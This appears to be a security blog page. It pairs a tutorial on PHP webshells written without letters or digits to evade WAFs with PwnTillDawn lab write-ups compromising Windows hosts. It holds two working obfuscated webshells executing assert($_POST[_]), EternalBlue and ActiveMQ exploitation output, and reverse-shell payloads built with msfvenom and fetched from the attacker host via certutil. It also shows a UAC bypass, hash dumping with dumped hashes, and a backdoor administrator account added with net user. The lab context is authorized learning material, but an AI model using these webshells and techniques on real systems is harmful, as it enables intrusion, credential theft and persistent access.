bypass-waf-php-webshell-without-numbers-letters

[Bypass WAF] Php webshell without numbers and letters

For bypass WAF, you can use some techniques to re-write your webshell.

Idea

First, clear ideas. My core idea is to non-letter, the characters of the characters through a variety of changes, and finally construct any az in the characters. And then use PHP to allow dynamic functions to perform the characteristics of splicing a function name, such as “assert”, and then the dynamic implementation of the.

So, the transformation method will be the main point to solve this problem.

But before that, I need to talk about the difference between php5 and 7.

Php5 assert is a function, we can use $f='assert';$f(...);this method to dynamically execute arbitrary code.

But php7, assert is no longer a function, into a language structure (similar to eval), can not be used as a function name dynamic implementation of the code, so use a little more complicated. But there is no need to worry too much, for example, we use the file_put_contents function, the same can be used to gethell.

For the sake of convenience, use PHP5 as the environment, PHP7 related to the use of their own way to explore it.

Method 1

This is the easiest and easiest way to think about it. In PHP, the two strings after the implementation of XOR operation, or a string. So, we want to get a letter in az, to find a two non-letter, the number of characters, their XOR results can be the letter.

Get the following results:

<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;
$_($___[_]); // assert($_POST[_]);

The results are as follows:

Method 2

Using PHP a little skill, look at the document: http://php.net/manual/en/language.operators.increment.php

PHP follows Perl’s convention when dealing with arithmetic operations on character variables and not C’s. For example, in PHP and Perl $a = ‘Z’; $a++; turns $a into ‘AA’, while in C a = ‘Z’; a++; turns a into ‘[‘ (ASCII value of ‘Z’ is 90, ASCII value of ‘[‘ is 91). Note that character variables can be incremented but not decremented and even so only plain ASCII alphabets and digits (a-z, A-Z and 0-9) are supported. Incrementing/decrementing other character variables has no effect, the original string is unchanged.

So, how to get a variable for the string ‘a’?

Coarse, the first letter of the array (Array) is capitalized A, and the fourth letter is lowercase a. In other words, we can get both lowercase and capitalized A, which means that we can get az and AZ all the letters.

In PHP, if you want to join arrays and strings, the array will be converted to a string whose value is Array:

And then take the first letter of the string, you can get ‘A’.

Using this technique, I wrote the following webshell (because the PHP function is case insensitive, so we end up doing it ASSERT($_POST[_]):

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
 
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
 
$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);

@ not allowed , but not needed 😉 , it just avoids errors but the execution follows on [ setting @ or not ]

ptd-mrblue-private

As always we start with a nmap scan

# Nmap 7.80 scan initiated Wed Aug 26 10:02:31 2020 as: nmap -Pn -oN 242.nmap 10.150.150.242
Nmap scan report for 10.150.150.242
Host is up (0.031s latency).
Not shown: 986 closed ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown

# Nmap done at Wed Aug 26 10:02:39 2020 -- 1 IP address (1 host up) scanned in 8.18 seconds
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $

.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.150.150.242
rhost => 10.150.150.242
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.150.150.242:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.150.150.242:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.150.150.242
rhosts => 10.150.150.242
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.66.66.210:4444
[*] 10.150.150.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.150.150.242:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.150.150.242:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.150.150.242:445 - Connecting to target for exploitation.
[+] 10.150.150.242:445 - Connection established for exploitation.
[+] 10.150.150.242:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.150.150.242:445 - CORE raw buffer dump (53 bytes)
[*] 10.150.150.242:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.150.150.242:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 10.150.150.242:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 10.150.150.242:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 10.150.150.242:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.150.150.242:445 - Trying exploit with 12 Groom Allocations.
[*] 10.150.150.242:445 - Sending all but last fragment of exploit packet
[*] 10.150.150.242:445 - Starting non-paged pool grooming
[+] 10.150.150.242:445 - Sending SMBv2 buffers
[+] 10.150.150.242:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.150.150.242:445 - Sending final SMBv2 buffers.
[*] 10.150.150.242:445 - Sending last fragment of exploit packet!
[*] 10.150.150.242:445 - Receiving response from exploit packet
[+] 10.150.150.242:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.150.150.242:445 - Sending egg to corrupted connection.
[*] 10.150.150.242:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.150.150.242
[*] Meterpreter session 1 opened (10.66.66.210:4444 -> 10.150.150.242:51229) at 2020-08-26 10:09:19 +0100
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:483c7adb3e1378e9a187b42baa228745:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > shell
Process 3660 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

c:\users\Administrator.GNBUSCA-W054\desktop>whoami
whoami
nt authority\system

c:\users\Administrator.GNBUSCA-W054\desktop>

c:\Users\Administrator.GNBUSCA-W054\Desktop>type FLAG34.txt
type FLAG34.txt
c2e9e102e55d5697ed2f9a7ea63708c1cc411b79
c:\Users\Administrator.GNBUSCA-W054\Desktop>

c:\Users\Administrator.GNBUSCA-W054\Desktop>net user /ADD puck Geheim2020
net user /ADD puck Geheim2020
The command completed successfully.

c:\Users\Administrator.GNBUSCA-W054\Desktop>net localgroup administrators /add puck
net localgroup administrators /add puck
The command completed successfully.

connect with rdp
┌─[✗]─[user@parrot-virtual]─[~/Downloads]
└──╼ $xfreerdp /u:puck /p:Geheim2020 /v:10.150.150.242

Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.

ptd-elmariachi-pc-private

As always i start with a nmap scan

┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #nmap -Pn -p1-65535 10.150.150.69 -oN 69.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 11:42 BST
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 69.38% done; ETC: 11:43 (0:00:18 remaining)
Nmap scan report for 10.150.150.69
Host is up (0.032s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5040/tcp open unknown
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
50417/tcp open unknown
60000/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 57.50 seconds
┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #

$xfreerdp /u:puck /p:Geheim2020 /v:10.150.150.69

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.150.150.69
rhosts => 10.150.150.69
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 10.150.150.69:445 – An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.150.150.69:445 – Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

Password Brute-forcing using Nmap


ubuntu@ubuntu:~$ nmap –script smb-brute -p445 10.150.150.69 –script-args userdb=users.txt,passdb=passwords.txt

Install Nmap-Vulners
To install the nmap-vulners script, we’ll first use cd to change into the Nmap scripts directory.

cd /usr/share/nmap/scripts/
Then, clone the nmap-vulners GitHub repository by typing the below command into a terminal. That’s it for installing nmap-vulners. There’s absolutely no configuration required after installing it.

git clone https://github.com/vulnersCom/nmap-vulners.git

Cloning into ‘nmap-vulners’…
remote: Counting objects: 28, done.
remote: Compressing objects: 100% (23/23), done.
remote: Total 28 (delta 9), reused 19 (delta 4), pack-reused 0
Unpacking objects: 100% (28/28), done.

http://10.150.150.69:60000/
thinvnc
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rhosts 10.150.150.69
rhosts => 10.150.150.69
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rport 60000
rport => 60000
msf6 auxiliary(scanner/http/thinvnc_traversal) > run

[+] File ThinVnc.ini saved in: /root/.msf4/loot/20200826122605_default_10.150.150.69_thinvnc.traversa_219192.txt
[+] Found credentials: desperado:TooComplicatedToGuessMeAhahahahahahahh
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/thinvnc_traversal) >

flag67 = 2971f3459fe55db1237aad5e0f0a259a41633962

However, if you see the following in the “Write-Up” box, you can publish online the explanations of how you compromised that box but we ask you in return to give us credit for the machines by adding backlink to https://www.wizlynxgroup.com/  and https://online.pwntilldawn.com/  in your write-up.

ptd-hollywood-private

As always we start with a nmap scan

─[user@parrot-virtual]─[~/ptd]
└──╼ $nmap -Pn -p1-65535 10.150.150.219
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 08:55 BST
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 80.05% done; ETC: 08:56 (0:00:07 remaining)
Nmap scan report for 10.150.150.219
Host is up (0.032s latency).
Not shown: 65502 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
25/tcp    open  smtp
79/tcp    open  finger
80/tcp    open  http
105/tcp   open  csnet-ns
106/tcp   open  pop3pw
110/tcp   open  pop3
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
443/tcp   open  https
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
1883/tcp  open  mqtt
2224/tcp  open  efi-mg
2869/tcp  open  icslap
3306/tcp  open  mysql
5672/tcp  open  amqp
8009/tcp  open  ajp13
8080/tcp  open  http-proxy
8089/tcp  open  unknown
8161/tcp  open  patrol-snmp
10243/tcp open  unknown
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
49251/tcp open  unknown
61613/tcp open  unknown
61614/tcp open  unknown
61616/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 37.57 seconds
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $

 

Next we browse to 

Welcome to the Apache ActiveMQ!
http://10.150.150.219:8161/
it has an msf exploit 
https://www.exploit-db.com/exploits/42283

.

.

msf6 exploit(windows/http/apache_activemq_traversal_upload) > show options

Module options (exploit/windows/http/apache_activemq_traversal_upload):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD admin yes Password to authenticate with
PATH /fileserver/..\admin\ yes Traversal path
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.150.150.219 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8161 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the web application
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.66.66.210 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL no The system shell to use.


Exploit target:

Id Name
-- ----
0 Windows Java


msf6 exploit(windows/http/apache_activemq_traversal_upload) > run

[*] Started reverse TCP handler on 10.66.66.210:4444 
[*] Uploading payload...
[*] Payload sent. Attempting to execute the payload.
[+] Payload executed!
[*] Command shell session 1 opened (10.66.66.210:4444 -> 10.150.150.219:49284) at 2020-08-26 09:18:27 +0100

C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>whoami
whoami
hollywood\user

C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>

next we create a meterpreter executable

─[user@parrot-virtual]─[~/Downloads] $msfvenom -p windows/meterpreter/reverse_tcp lhost=10.66.66.210 lport=7777 -f exe > 7777.exe

.

─[✗]─[user@parrot-virtual]─[~/Downloads]
└──╼ $sudo python3 -m http.server 80
[sudo] password for user: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.150.150.219 - - [26/Aug/2020 09:25:00] "GET /7777.exe HTTP/1.1" 200 -
10.150.150.219 - - [26/Aug/2020 09:25:00] "GET /7777.exe HTTP/1.1" 200 -
c:\puck>certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
**** Online ****
000000 ...
01204a
CertUtil: -URLCache command completed successfully.

c:\puck>dir
dir
Volume in drive C has no label.
Volume Serial Number is 021A-9C32

Directory of c:\puck

08/26/2020 05:21 PM <DIR> .
08/26/2020 05:21 PM <DIR> ..
08/26/2020 05:21 PM 73,802 7777.exe
1 File(s) 73,802 bytes
2 Dir(s) 44,543,938,560 bytes free

c:\puck>

start the listener , and then execute c:\puck>7777.exe

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.66.66.210
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.66.66.210:7777 
msf6 exploit(multi/handler) >

.

msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

c:\puck>7777.exe
7777.exe

c:\puck>
[*] Sending stage (175174 bytes) to 10.150.150.219
[*] Meterpreter session 2 opened (10.66.66.210:7777 -> 10.150.150.219:49293) at 2020-08-26 09:32:53 +0100


c:\puck>
c:\puck>^Z
Background session 1? [y/N] y
msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
2 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219)

msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > hashdump 
[-] 2007: Operation failed: The parameter is incorrect.
meterpreter > 


meterpreter > shell
Process 5088 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\puck>whoami
whoami
hollywood\user

c:\puck>
c:\puck>^Z
Background channel 1? [y/N] y
meterpreter > 
Background session 2? [y/N] 
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester


msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.150.150.219 - Collecting local exploits for x86/windows...

[*] 10.150.150.219 - 34 exploit checks are being tried...
[+] 10.150.150.219 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.150.150.219 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 2
session => 2
msf6 exploit(windows/local/bypassuac_eventvwr) > run

[-] Handler failed to bind to 10.66.66.210:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\System32\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 10.150.150.219
[*] Meterpreter session 3 opened (10.66.66.210:4444 -> 10.150.150.219:49300) at 2020-08-26 09:44:50 +0100

[*] Cleaning up registry keys ...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_eventvwr) > 
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
2 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219)
3 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:4444 -> 10.150.150.219:49300 (10.150.150.219)

msf6 exploit(windows/local/bypassuac_eventvwr) >
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 
4 0 System x86 0 
244 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
328 312 csrss.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
364 3876 xampp-control.exe x86 1 HOLLYWOOD\User C:\xampp\xampp-control.exe
400 3876 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
408 312 wininit.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
416 400 csrss.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
464 400 winlogon.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
512 408 services.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
520 408 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
528 408 lsm.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
624 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
684 512 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
728 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
816 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
864 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
892 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
912 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
916 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1028 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1200 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1224 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1384 512 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1412 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1504 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1612 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
1664 512 splunkd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
1700 512 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\dllhost.exe
1728 328 conhost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
1760 512 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1816 512 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1832 624 WmiPrvSE.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\wbem\wmiprvse.exe
1880 364 mysqld.exe x86 1 HOLLYWOOD\User c:\xampp\mysql\bin\mysqld.exe
2240 512 SearchIndexer.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchIndexer.exe
2520 1664 splunk-winevtlog.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
2640 364 FileZillaServer.exe x86 1 HOLLYWOOD\User c:\xampp\filezillaftp\filezillaserver.exe
2676 364 mercury.exe x86 1 HOLLYWOOD\User c:\xampp\MercuryMail\mercury.exe
2748 400 java.exe x86 1 HOLLYWOOD\User C:\Program Files\Common Files\Oracle\Java\javapath\java.exe
2824 3876 jusched.exe x86 1 HOLLYWOOD\User C:\Program Files\Common Files\Java\Java Update\jusched.exe
2908 3916 httpd.exe x86 1 HOLLYWOOD\User C:\xampp\apache\bin\httpd.exe
2992 5004 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
3008 2748 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
3124 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3156 3876 vmtoolsd.exe x86 1 HOLLYWOOD\User C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
3472 364 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\System32\cmd.exe
3548 512 taskhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\taskhost.exe
3640 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3776 3472 java.exe x86 1 HOLLYWOOD\User C:\Program Files\Java\jre1.8.0_231\bin\java.exe
3820 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3840 864 dwm.exe x86 1 HOLLYWOOD\User C:\Windows\system32\Dwm.exe
3856 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3876 3608 explorer.exe x86 1 HOLLYWOOD\User C:\Windows\Explorer.EXE
3916 364 httpd.exe x86 1 HOLLYWOOD\User c:\xampp\apache\bin\httpd.exe
3968 512 wmpnetwk.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Program Files\Windows Media Player\wmpnetwk.exe
4080 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
4632 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
4824 512 taskhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\taskhost.exe
4912 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
5004 3008 7777.exe x86 1 HOLLYWOOD\User c:\puck\7777.exe
5088 5004 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
5356 4372 powershell.exe x86 1 HOLLYWOOD\User C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
5904 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe

meterpreter > migrate 3820
[*] Migrating from 5356 to 3820...
[*] Migration completed successfully.
meterpreter > shell
Process 5184 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

certutil -urlcache -split -f http://10.66.66.210/fgdump.exe c:\puck\fgdump.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.exe c:\puck\winpeas.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.bat c:\puck\winpeas.bat
certutil -urlcache -split -f http://10.66.66.210/Chimichurri.exe c:\puck\Chimichurri.exe
certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe

└──╼ $msfvenom -p windows/meterpreter/reverse_tcp lhost=10.66.66.210 lport=7777 -f exe > 7777.exe

multi/handler
run -j

 

powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\pwdump7.exe -Uri http://10.66.66.210/pwdump7.exe

certutil -urlcache -split -f http://10.66.66.210/pwdump8.exe c:\puck\pwdump8.exe

c:\puck>pwdump8.exe
pwdump8.exe

PwDump v8.2 – dumps windows password hashes – by Fulvio Zanetti & Andrea Petralia @ http://www.blackMath.it

Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
User:1000:AAD3B435B51404EEAAD3B435B51404EE:F9E1A02072D330DDF77AD82CB54D5EC4
HomeGroupUser$:1002:AAD3B435B51404EEAAD3B435B51404EE:283C3C4DC5544A73569F35F22A5B1DCA

c:\puck>
C:\Windows\system32>powershell -c Get-PSDrive
certutil -urlcache -split -f http://10.66.66.210/winpeas.exe c:\puck\winpeas.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.bat c:\puck\winpeas.bat

REG QUERY HKLM /v “EditionID” /s

Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.

Protected: htb-omni-nl

This content is password protected. To view it please enter your password below:

Posted on

Protected: htb-laser-nl

This content is password protected. To view it please enter your password below:

Posted on

Protected: htb-walker-nl

This content is password protected. To view it please enter your password below:

